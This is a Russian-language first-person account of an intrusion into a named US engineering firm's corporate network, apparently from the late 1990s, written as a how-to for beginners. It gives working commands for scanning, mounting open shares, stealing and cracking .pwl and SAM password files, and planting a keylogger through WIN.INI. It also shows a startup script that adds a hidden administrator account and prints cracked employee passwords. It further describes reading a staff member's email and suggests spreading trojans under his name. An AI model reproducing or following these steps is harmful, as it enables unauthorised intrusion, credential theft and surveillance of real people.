Изучение корпоративной сети компании
 "XXXXX" Engineering Co. of North Carolina Inc".
 [реальное название компании опущено]

 CyberPunk

Часть I.
"Вот эта улица вот этот дом:"

Стоит начать с того, что многие организации и компании часто строят свои корпоративные сети на основе уже существующих глобальных сетей, точки входа в которые имеются в очень многих городах по всему миру. Это дает возможность отделениям и филиалам компаний оперативно обмениваться информацией. При этом используются ресурсы уже имеющейся глобальной сети, что естественно снижает затраты на построение и обслуживание корпоративной сети. Одной из таких сетей является сеть коммутации пакетов SPRINT (раньше она так называлась, а теперь это Global One Networks). Эта сеть имеет большую протяженность оптоволоконных каналов и отличается качеством предоставляемых услуг, надежностью соединения.

В глобальных сетях существует понятие адреса. Зная такой адрес можно подключиться к определенному хосту (компьютеру). Иногда кроме адреса требуется ввести имя хоста. Сканирование подобных сетей (перебор адресов) определенными лицами позволяет им находить хосты, вход на которые плохо защищен или вообще открыт. Иногда попадаются хосты, через которые можно выходить в INTERNET.

Работа по изучению описываемой корпоративной сети проводилась на компьютере с Windows 95.

Написав простейшую программу-сканер и запустив ее на ночь, через несколько дней (ночей) мне удалось найти интересный хост по адресу:

@ 03110XXXXXXX (Прим авт.: реальный адрес не указывается)

Это оказалась довольно большая корпоративная сеть компании "XXXXXX" Engineering Co. of North Carolina Inc." и ее дочерних предприятий. Предприятия расположены во многих городах США. Кроме того, как мне кажется, существуют так называемые мобильные пользователи, которые, используя все ту же сеть "Global One", работают с центральным офисом.

Данная корпоративная сеть работает на базе стэка протоколов TCP/IP и использует технологии сети INTERNET. Ну что же, может быть, нам повезет, и нас пустят в INTERNET?:

c:\>ping www.cnn.com
Pinging cnn.com [207.25.71.24] with 32 bytes of data:
Reply from 157.143.10.5: TTL expired in transit.
Reply from 157.143.10.5: TTL expired in transit.
Reply from 157.143.10.5: TTL expired in transit.
Request timed out.

Нет не пускают.
Попробуем трассировку:
c:\>tracert www.cnn.com
Tracing route to cnn.com [207.25.71.26] 
over a maximum of 30 hops:
  1  1408 ms  1392 ms  1059 ms  157.143.10.2 
  2  1332 ms  1303 ms  1169 ms  max4002.bekral.com [157.143.10.5] 
  3  1163 ms  1177 ms  1692 ms  157.143.10.2 
           4  1447 ms  1612 ms  1550 ms  max4002.bekral.com [157.143.10.5] 
    ::::. и т.д.

Ну что же, все понятно. Должно существовать что-то вроде Proxy-сервера. Ладно. Поиск выхода в INTERNET пока отложим. Сейчас посмотрим, что за люди здесь работают, и на каких машинах. Кстати, а кто я? Какой адрес-то мне дали? Не заметил: Ладно запускаю стандартную программу winipcfg и узнаю, что:

1. После соединения с хостом мне был любезно выделен адрес 157.143.14.21;
2. Маска подсети: 255.255.0.0;
3. Главный сервер WINS : 157.143.14.4;
4. Сервер DNS: 157.143.14.1;

Посмотрим, кто у нас соседи. Запустив программу сканирования IP-адресов 157.143.14.* , выяснилось, что имеется некоторое количество рабочих станций с открытым портом № 139 (nbsession). Кроме того, есть и такие где открыты порты № 21(ftp) и № 23(telnet).

Теперь пришло время воспользоваться программой Essential NetTools компании TamoSoft (http://www.tamos.com/). Она мне симпатична тем, что генерирует отчеты в виде таблицы и записывает все в html-файл. Вот результат ее работы:

NBScan Report

Computer Name Workgroup RS IP Address Name Table
BRASHERD BEK2.DOM Yes 157.143.14.37 BRASHERD <00> UNIQUE
BEK2.DOM <00> GROUP
BRASHERD <20> UNIQUE
BEK2.DOM <1E> GROUP
INet~Services <1C> GROUP
IS~BRASHERD <00> UNIQUE
KHOUSTON BEK2.DOM Yes 157.143.14.66 KHOUSTON <00> UNIQUE
BEK2.DOM <00> GROUP
KHOUSTON <20> UNIQUE
KHOUSTON <03> UNIQUE
BEK2.DOM <1E> GROUP
COBRA BEK2.DOM Yes 157.143.14.122 COBRA <00> UNIQUE
BEK2.DOM <00> GROUP
COBRA <03> UNIQUE
COBRA <20> UNIQUE
BEK2.DOM <1E> GROUP
COBRA <6A> UNIQUE
COBRA <87> UNIQUE
CRAWFORDB BEK2.DOM Yes 157.143.14.132 CRAWFORDB <00> UNIQUE
BEK2.DOM <00> GROUP
CRAWFORDB <03> UNIQUE
CRAWFORDB <20> UNIQUE
BEK2.DOM <1E> GROUP
BEK2.DOM <00> GROUP
WOODA <20> UNIQUE
BEK2.DOM <1E> GROUP
INet~Services <1C> GROUP
IS~WOODA <00> UNIQUE
WOODA <01> UNIQUE

This report was generated by Essential NetTools

Из этого отчета видно, что существует некий домен BEK2.DOM, в котором есть машины с общедоступными ресурсами. Контроллера домена пока не видно. После настройки файла hosts попытаемся подключиться к одной из машин. Поиск в сетевом окружении машины "COBRA" завершился успешно, но все доступные ресурсы запоролены:.

Продолжаем знакомство с соседями:

с:\> net view /workgroup:BEK2.DOM > bek2_list.txt
Серверы, доступные рабочей группе BEK2.DOM.
Сервер                 Заметки
\\98202B               
\\98750                NCR 3230
\\ABDFIELD1            As Built Data Field Computer
\\ACT2                 act2\swb
\\ACT3                 
\\ARMOURR              
\\ASBUILT2             NADA
\\AUTOMATION1          
\\BAINBRIDGEM          
\\BAKERAVIS            
\\BENSKENS             Pro Computer P-100

и т. д. Полный список приводить пока не буду. Всего в домене BEK2.DOM оказалось более 300 машин.

Дааа. Впечатляет:. Программы для сканирования общедоступных ресурсов под рукой не оказалось. Ничего это не проблема. Я написал небольшую программу, которая, используя список рабочих станций и серверов в домене (как вы уже поняли, этот список я записал в файл bek2_list.txt), сгенерировала мне батник (командный файл). Этот батник содержал вызовы стандартной программы NET VIEW для просмотра общих ресурсов рабочей станции или сервера. Например вот так:

C:\> NET VIEW \\BENSKENS > BENSKENS.RES

А вот результат в файле BENSKENS.RES:

Общие ресурсы компьютера \\BENSKENS
Сетевое имя  Тип          Заметки
-------------------------------------
CDROM        Диск         
SEAN         Диск         
Команда выполнена успешно.

Часть II
"Дерни за веревочку - дверь и откроется"

Таким образом, в результате я получил имена всех не скрытых общих ресурсов на всех машинах в домене.

Хозяин машины \\BENSKENS меня, конечно же, не ждал, но я все-таки пришел. Машина с Windows 95. Там я обнаружил два доступных ресурса "CDROM" и "SEAL". Причем, как потом оказалось, ресурс с именем "SEAL" указывал на корень диска "С". "Вот ты и попался",- подумал я и написал:

с:\> net use e: \\BENSKENS\SEAL

Пароль на полный доступ подобрать не удалось, но на доступ "Read Only" пароля не было. Кстати, если Вы получили доступ "Read Only", то стоит попробовать команду:

net use e: \\BENSKENS\SEAL ? (добавлен знак вопроса). В этом случае система будет запрашивать пароль. Довольно часто случается так, что пользователь ставит пароль на полный доступ к ресурсу, в то время как доступ "Read Only" свободный.

Теперь я сделал так:

с:\> copy e:\windows\*.pwl c:\

В результате у меня есть два файла: JORDANJ.PWL и REEDR.PWL. Последний был размером в 606 байт и не содержал никакой полезной информации, поэтому сразу отпал. Из первого удалось выдрать пароль. При этом использовалась программа "Win95 Password Trainer" v1.0a by Hard Wisdom. Программа подбирает пароль на основе wordlist'а. Правда, в результате паролем оказалось слово: "PASSWORD". J Пароль, конечно, мягко говоря, не очень, но на кое-какие мысли в отношении здешних пользователей и политики безопасности натолкнуть может. Может быть, такие пароли и допустимы в небольших локальных сетях, но ведь эта сеть имеет выход в интернет и, более того, имеется свободный вход из Sprint'a!!!

Приняв такой пароль к сведению, я продолжил попытки подключения к другим машинам. Теперь если просили ввести пароль, я вводил PASSWORD в первую очередь. Если после нескольких попыток меня не пускают, то я перехожу к следующей машине. Думаю, что сначала надо попробовать самый простой путь. И я не ошибся: . Следующим пала станция с именем \\WILLIAMSE, принадлежащая некой Elaine Williams. Здесь следует отметить, что сначала я проверял те машины, которые содержали информацию в поле "Описание компьютера" ("Comment"), так как, не смотря на огромное количество рекомендаций относительно выбора паролей, пользователи компьютерных сетей продолжают выбирать в качестве пароля свои имена, номера телефонов и т.д. Но здесь я остановлюсь поподробнее. Имя общего ресурса было очень простым "C". Паролем был "PASSWORD". Полный доступ на чтение и запись. Действуем аналогично:

c:\> net use e: \\WILLIAMSE\C
c:\> copy e:\windows\*.pwl c:\

На этот раз улов больше. Пользуясь той же программой для выдирания паролей получим:

doimeadi.pwl        Пароль: "PASSWORD"
franklin.pwl        Пароль: "PASSWORD"
williams.pwl        Пароль: "BEACH"

И тут меня осенило. Как было сказаны выше, я предположил, что где-то должен быть Proxy-сервер, для того чтобы все пользователи сети могли работать с INTERNET. А что такая возможность у них имеется, я был уверен на все 100%. Тогда я подумал, что если есть Proxy, то должны быть пользовательские настройки для работы с ним. А где мне их найти? Самый легкий способ посмотреть в файле USER.DAT или USER.DA0. Поэтому я пишу:

c:\> copy e:\windows\user.da0 c:\

Хотя соединение со Sprint у нас не очень - 14400 - но файл USER.DA0 размером 209336 байт не заставил себя долго ждать и появился у меня на диске "С". И вот я уже просматриваю его в "FAR Manager"и набираю поиск слова "Proxy". И что же в результате? А результат можно видеть здесь (часть USER.DA0):

MSIE 3.01; Windows 95) ProxyServer157.143.13.36:80 ProxyOverride ProxyEnable EnableAutodial

Как видите, здесь вам и адрес, и номер порта. Дальше настраиваю браузер на работу с этим Proxy и : при попытке соединиться с Proxy выдается запрос ввести имя и пароль. Ну мне ничего не оставалось как ввести:

User Name: WILLIAMS
Password: BEACH

Ну вот теперь все встало на свои места и я читаю новости на http://www.cnn.com/. Сразу отмечу, что данный Proxy-сервер также выполняет функции обратного Proxy.

Следующей мыслью было следующее: "А вдруг полный доступ к машине WILLIAMS включен временно? Его могут отключить в любую минуту". Тогда я нашел у себя на диске замечательную программу Ильи Осипова "HookDump" (www.halyava.ru/ilya). Настроил ее должным образом. Т.е. чтобы она запускалась в скрытом режиме и записывала все действия пользователя в файл kernel32.dlm в каталог C:\WINDOWS\SYSTEM, предварительно выполнив операцию XOR. Затем я скачал файл WIN.INI с машины многоуважаемой Elaine Williams:

c:\> copy e:\windows\win.ini c:\

Внес в него изменения:

[windows]
load=
run=c:\windows\system\kernl32.exe           

А затем закачал файл hookdump.exe в каталог C:\WINDOWS\SYSTEM, предварительно переименовав его в kernl32.exe, а измененный файл WIN.INI закачал обратно. Вот теперь как только многоуважаемая Elaine Williams перезагрузит машину, я буду иметь представление о том что она делает в течении рабочего дня: какие программы использует, какие клавиши нажимает, куда щелкает мышкой:. Сразу скажу, что к моему удивлению долгожданный файл KERNEL32.DLM, содержащий результат работы hookdump'a, не появлялся на протяжении 2 дней! Я уже стал волноваться. Но потом он все-таки появился. Теперь можно скачивать файл с результатами и, выполнив над всеми байтами операцию XOR, спокойно просматривать кому и зачем Elaine Williams пишет письма, отправляет отчеты:..может быть она захочет сменить пароль для полного доступа: мы все это увидим.

В общем, после подобного анализа рабочих станций домена BEK2.DOM и скачивания файлов *.pwl мне удалось узнать еще несколько паролей. Затем в настройках "сетевого окружения" я сделал следующую вещь.. В свойствах клиента сетей MicroSoft я поставил, что необходимо входить в домен Windows NT (BEK2.DOM). Теперь в момент регистрации в домене я могу проверить все найденные пароли на общие ресурсы на предмет совпадения их с паролями для регистрации в домене. Так оно и есть. Ряд паролей является паролями для входа в домен BEK2.DOM. Кстати, здесь же я узнал адрес главного контроллера домена: 157.143.13.4. Это, конечно, не составляет никакого труда. В тот момент, когда котроллер домена запрашивает имя пользователя и пароль я запустил стандартную программу "NETSTAT" и увидел адрес. Все очень просто. В последствии выяснилось, что в подсети 157.143.13.* находятся наиболее важные сервера этой интранет. Приведу результат работы программы NetScanTools:

[NetScanner Ping Scan of 157.143.13.1 -> 157.143.13.254]
157.143.13.1    is8.bek.com
157.143.13.2    dp.bek.com
157.143.13.4    dc.bek.com
157.143.13.5    hawk.bek.com
157.143.13.6    docs.bek.com
157.143.13.7    mail.serve.bek.com
157.143.13.9    act.bek.com
157.143.13.12   act2.bek.com
157.143.13.14   act3.bek.com
157.143.13.16   act4.bek.com
157.143.13.17   is5.bek.com
157.143.13.18   is6.bek.com
157.143.13.21   ?
157.143.13.25   is9.bek.com
157.143.13.26   pyftp.bek.com
157.143.13.29   pdmsserver.bek.com
157.143.13.30   is4.bek.com
157.143.13.31   melendez.bek.com
157.143.13.36   cardinal.bek.com
157.143.13.47   cardinal.bek.com
157.143.13.49   host1pc.bek.com
157.143.13.50   est1.serve.bek.com
157.143.13.54   pch.serve.bek.com
157.143.13.56   unix2.serve.bek.com
157.143.13.57   wp.bek.com
157.143.13.60   unix1.serve.bek.com
157.143.13.61   smot2.bek.com
157.143.13.62   unix51.serve.bek.com
157.143.13.63   cost.serve.bek.com
157.143.13.65   epic.bek.com
157.143.13.68   ncr50.bek.com
157.143.13.71   engr1.bek.com
157.143.13.72   ?
157.143.13.73   sms.bek.com
157.143.13.76   is.bek.com
157.143.13.77   pyfld.bek.com
157.143.13.79   ?
157.143.13.80   y2k.bek.com
157.143.13.81   imail.bek.com
157.143.13.82   bekclnt.bek.com
157.143.13.83   forms.bek.com
157.143.13.84   support.bek.com
157.143.13.85   connect.bek.com
157.143.13.86   cbt.bek.com
157.143.13.87 ?

Здесь также я хотел бы отметить, что если Вы каким-то образом узнали регистрационное имя и пароль пользователя для входа в домен, то Вы можете, а точнее у Вас имеется шанс, получить полный или частичный доступ к общим ресурсам на рабочих станциях с Windows 95. Точнее к тем из них, на которых указано управление доступом на уровне пользователей. Так как в этом случае Windows 95 обращается к домену Windows NT или серверу NetWare для получения доступа пользователя или группы, которым можно назначить конкретные права доступа по каждому общему ресурсу.

С другой стороны если пользователь Windows 95 указывает управление доступом на уровне пользователей, то при запуске Windows 95 он обязан указать имя и пароль зарегистрированные в домене (ну или на том сервере, с которого берется список пользователей, но чаще всего это и есть контроллер домена). Другими словами, узнав такой пароль, Вы получаете возможность регистрации в домене, а, следовательно, по причине описанной в предыдущем абзаце, шанс подключать общие ресурсы на других станциях, использующих управление доступом на уровне пользователей. Правда есть один нюанс: Для получения списка зарегистрированных пользователей с сервера, пользователь, использующий управление доступом на уровне пользователей, должен иметь соответствующие права.

Также если у Вас имеется имя и пароль для регистрации в домене и этот пользователь обладает достаточными правами, то Вы можете настроить свою машину на управление доступом на уровне пользователей и когда Вы попытаетесь сделать один из своих каталогов/принтеров общим ресурсом, Ваша станция загрузит с указанного Вами сервера имена зарегистрированных пользователей. Ну а это, в свою очередь, может помочь Вам в работе по подбору паролей.

Вообще говоря, мне немного не понятна эта ситуация. Если считается, что средство общего доступа к файлам и принтерам будет использоваться для обеспечения базовых функций одноранговой сети, то при чем тут сервер Windows NT или NetWare? Логичнее предоставить возможность пользователю Windows 95 самому создавать группы и пользователей на своей станции, а не заставлять систему обращаться к какому-то там левому серверу за этой информацией. Да еще не известно какой там администратор.

Вы уже заметили, что для размещения основных серверов сети выбрана подсеть 157.143.13.*. Чертова дюжина, однако. А кто тут в качестве черта интересно? Я думаю, что самый главный черт тут - АДМИНИСТРАТОР. J

Названия некоторых серверов говорят сами за себя, избавляя атакующего от дальнейшего сканирования. Например, не трудно догадаться, что по адресам 157.143.13.7, 157.143.13.81 находятся почтовые сервера. К почте я еще вернусь:.

На всех упомянутых мною станция сети была установлена Windows 95, но были и такие, которые работали под Windows NT Server | WorkStation. Здесь я применил следующий метод.

Как известно при инсталляции Windows NT в каталоге C:\WINDOWS\REPAIR создается очень интересный для нас файл. Это файл "SAM._", который содержит упакованную версию SAM-базы. Здесь вы можете найти список пользователей и их пароли. Данный файл обновляется, когда запускается утилита rdisk. Как правило, пользователи могут свободно копировать этот файл. Так вот на очень многих серверах и рабочих станций этой сети вход для пользователя GUEST открыт. Ну сколько раз надо предупреждать: ВЫКЛЮЧИТЕ ПОЛЬЗОВАТЕЛЯ GUEST!!!!!! Нет, они как нарочно его оставляют. Дальше все очень просто. Пытаемся подцепиться к серверу:

C:\> NET USE \\ACT2\IPC$ > ACT2.IPC

Ресурс IPC$ (Inter-Process Communication) обеспечивает двунаправленную связь между процессами на двух компьютерах. Если удается подцепить этот ресурс, то имеется возможность просматривать и подключить общие ресурсы сервера. Опять же через BAT-файл я выявил такие сервера. Было очень интересно; когда я пытаюсь смотреть ресурсы некоторых серверов в сетевом окружении, то видна только папка "netlogon". Видимо администратор думает, что, поставив знак $ в названии ресурсов, он обезопасил себя. Элементарно ввожу что-то вроде:

C:\> NET USE E: \\VIATECH-NTBHM\C$

и меня спокойно впускают. Правда, здесь я забегаю немного вперед. Дело в том, что вся интранет состоит из восьми доменов с доверительными отношениями между ними. Так вот сервер VIATECH-NTBHM является основным контроллером домена VIATECH.DOM. Еще есть сервер VIATECH-BDC - резервный контроллер домена. Ну как? Вы уже ужаснулись? А я ужаснулся сразу после того как приведенная выше команда сработала. Дело в том, что при инсталляции NT на контроллере домена пользователь GUEST по умолчанию заблокирован, а здесь он по какой-то причине, известной только администратору и господу Богу открыт. И не только открыт, а не имеет никакого пароля. Далее, как я уже писал выше, копируем файл SAM._ из каталога C:\WINNT\REPAIR

C:\> COPY E:\WINNT\REPAIR\SAM.* C:\

Ну вот. Теперь у меня есть файл и с именами пользователей и с их паролями. Правда это еще не все. Ведь этот файл запакован. Для этого существует программа l0phtcrack95.exe (l0phtcrack.exe для NT). Ее можно найти по адресу http://www.l0pht.com/.

Перед тем как скармливать файл SAM._ программе l0phtcrack необходимо проделать следующую операцию:

C:\> EXTRACT SAM._ C:\SAM.OK

или, если Вы работаете на Windows NT:

C:\> EXPAND SAM._ C:\SAM.OK

В результате у Вас получится файл SAM.OK, который и надо обработать l0phtcrack'ом. Еще один совет. Обзаведитесь парой хороших Wordlist'ов. Это Вам поможет, как помогло мне. Приведу результат работы l0phtcrack'a над файлом SAM с сервера VIATECH-NTBHM, а точнее небольшую его (результата) часть. Этот результат получен в ходе работы с одним из моих Wordlist'ов. Позднее файл SAM был расшифрован в ходе "Brute Force".

User Name LanManPassword <8 NT Password
Administrator      
Guest NO PASSWORD   NO PASSWORD
roavery   x  
VIATECH-NTBHM$      
BTIAdmin ???????N    
sqlexec   x  
SQLExecutiveCmdExec ???????J    
IUSR_VIATECH-NTBHM   x  
SMSAccount      
BURKSC   x  
COXT   x  
CREASMANA MADISON   madison
FIREWALL PASSWORD   PASSWORD
GRAVESM ???????S    
HOPKEYA   x  
JANE PASSWORD   password
JORDANO   x  
KINZERE   x  
KUNZEK STRAT x strat
MCANALLYR GRIFFIN   griffin
WILSONS PASS   pass
ArcServeAdmin ???????E    
HillJy HILL   hill
BrownGh BROWN   brown

Пожалуй хватит. Ну как? Вот, вот. А теперь внимание вопрос! На размышление 10 секунд. Угадайте, какой пароль имеет пользователь BTIAdmin? Если видно, что пароль состоит из восьми символов и заканчивается на букву "N"? Я угадал с первого раза это не что иное как "BTIADMIN" J . А вот теперь угадайте пароль у пользователя ArcServeAdmin. Если известно, что пароль заканчивается на букву "E". Наверное, догадались. Я подумал, что это "ARCSERVE" и, естественно, был прав. Ну и дальше для пользователя "sqlexec" пароль - в лучших традициях этой сети - "sqlexec". Вот это уже реальная опасность для SQL-сервера! Но мы не собираемся приобретать известность методами Герострата.

Часть III
"Пишите письма"

Ну вот как-то незаметно для самого себя я перешел на домен VIATECH-NTBHM, а ведь хотел поведать Вам о работе почты в домене BEK2.DOM. Сделаю это сейчас.

В общем, дело было так. Сканирование подсети 157.143.13.* на предмет открытых портов № 110 (POP3) и № 25 (SMTP) дало следующие результаты:
SMTP: 157.143.13.26 и еще несколько. Мне достаточно этого.
POP3: 157.143.13.5, 157.143.13.18, 157.143.13.81

Используя стандартную программу telnet.exe и добытые к настоящему моменту имена пользователей и пароли, пробую подцепиться к POP3-серверам. В конце концов, под видом некоего Andy Wood удалось войти на POP3-сервер по адресу 157.143.13.18.

Привожу наш диалог с сервером:

+OK Microsoft Exchange POP3 server version 5.0.1460.9 ready     это сервер
user wooda                                  это мы
+OK                                     это сервер
pass andrew                                 это мы
+OK User successfully logged on                     это сервер
stat                                        это мы
+OK 210 10408126                                это сервер
quit                                        это мы
+OK Microsoft Exchange POP3 server version 5.0.1460.9 signing off   это сервер

Так. Ясно. Либо Andy давненько не забирал почту либо он какой-то очень крутой человек в этой сети. У него в почтовом ящике лежит 210 писем! Возможен еще вариант - сообщения по какой-то причине не удаляются с сервера. Ну что же посмотрим что за Andy Wood тут работает. Настроив своего почтового клиента на данный сервер, я закачал почту Andy и, восстановив ее на сервере, пошел читать.

Приведу пару интересных писем.

Это первое:
-----Original Message-----
From: Harris, Paul
To: Wood, Andy
Sent: 3/19/99 11:10 AM
Subject: Loading WIN95 on computers without CDRom

Hey Andy,

Presently when I need to load windows onto a computer I acess a novell server(Mobile_arc), If we do away with those servers. How am I going to load win95 on computers in the future? I realize that the newer computers and those computers having a CD rom now, I can install WinNT. But we still have some 133's and 200's that don't have a cd rom in them and still. Untill we replace those older computers, this may pose a problem unless we keep one of those novell servers to reload win95 for that matter. Not to insult your intelligence, but do you see what I am talking about? If theres another way to load win95 on a computer without using a cdrom, I'm not aware of it at this time.
I guess my whole point being, can we keep a novell server on the network until we weed all of these older computer out?

А это второе:
Systems Coordinator
334-304-3802
Mr. Kwan,

My name is Andy Wood, I work in the IS department at XXXXXX. I had a message to get in touch with you about getting you McAfee antivirus, finding out if Northstar is running Windows 95, what MS Office products are being used (Office 97 or 95), and approximately how many workstations are being used. This info is for future purchases and inventory. If you need McAfee, let me know whether I should email you the software or mail you a cd with the software on it. Whichever is easier for you. Thanks

В общем, почитав немного почту, я выяснил, что Andy занимается рассылкой программного обеспечения другим пользователям. Иногда Andy устанавливает софт прямо на машины пользователей по сети. Кроме того, он отвечает за своевременное обновление антивирусных программ. В сети повсеместно установлен антивирусный пакет "McAfee Antivirus".

Ну что же, Andy Wood действительно не последний человек в этой сети. Особенно если учитывать тот факт, что, используя его имя, мы вполне можем разослать по всей сети (среди писем встречались сообщения от пользователей других доменов) что-то вроде: "ускоритель работы компьютера" или "Ваш Internet будет работать быстрее", а на самом деле "NetBus" или "BO". Кое-какую проблему может составить McAfee, но, немного подумав, вы и сами можете догадаться, как его обойти.

Однако рассылка "троянцев" и "вирусов" по сети не входит в мои планы. Я действую по принципу "не навреди".

В результате просмотра почты я стал владельцем довольно обширного списка пользователей сети. Кроме того, появилась информация личного характера о некоторых из них. Как то: где работает, номер телефона, адрес, уровень знаний в области компьютеров и т.д. Другими словами уже можно пробовать подбирать пароли. Но, как Вы увидите дальше, эта информация только лишь цветочки.

Часть IV
"Здравствуйте! Я - Ваша тетя".

Теперь самое время перейти к разговору о домене VIATECH.DOM. Давненько я не видывал такой работы администратора... Точнее сказать тут вообще не видно, чтобы кто-то работал по администрированию всего домена и сервера в частности.

Как я уже сказал, мне удалось стянуть с этого сервера (в последствии удалось скачать еще несколько SAM'ов с других серверов) - контроллера домена - файл SAM._. Походив немного по серверу под GUEST, я решил зайти под более "крутым", в смысле прав, пользователем - ArcServeAdmin. Сразу стали доступны некоторые интересные каталоги. Например, каталоги с финансовыми отчетами фирмы, балансами, адресами филиалов, именами сотрудников... и т.д. Вот, например, в одном из каталогов лежат файлы контрактов работников с нанимателями. В них указаны домашние адреса, телефоны, возраст, профессия, зарплата, электронные адреса... Не хватает только кредитных карт. В другом каталоге лежат резюме, как кандидатов, так и уже работающих сотрудников. Интересно было посмотреть на формы, заполняемые на каждого сотрудника. Там указаны абсолютно все данные. В одной из форм на уволенного сотрудника (формы на уволенных хранились в отдельном каталоге) была указана следующая причина увольнения: They did not need him anymore. J

После просмотра некоторых документов я решил заняться получением прав администратора на этом сервере. Нужно отметить, что, понаблюдав за сервером некоторое время, я решил, что администратор к нему подходит очень редко.

Пишем следующий скрипт:

net user KERNEL qwerty /ADD /passwordreq:no
net localgroup Administrators KERNEL /ADD
del "c:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup\*" /Q >nul
del c:\kernel.cmd

Записываю его в корень диска "C" под именем kernel.cmd.

Затем в каталог:

C:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup закидываю ярлык, указывающий на файл c:\kernel.cmd. Теперь когда администратор зайдет на сервер, скрипт сработает и добавит пользователя KERNEL с правами Администратора и с паролем "qwerty". В конце концов скрипт удаляется.

Часть V
Заключение.

Описанная вычислительная сеть имеет в своем составе огромное количество рабочих станций и серверов. Причем имеются сервера не только с Windows NT Server, но и с UNIX и с NetWare. Изучение работы такой обширной сети довольно затруднительно силами одного человека. В этой статье я постарался описать только самые простые приемы, которые, может быть, помогут начинающим российским пользователям и администраторам компьютерных сетей. В ходе изучения функционирования данной сети применялись и другие более сложные приемы. На многих серверах сети доступен сервис ftp с открытым входом для пользователя anonymous. На ftp-серверах также было чем поживиться, но об этом в следующий раз : .

www.000webhost.com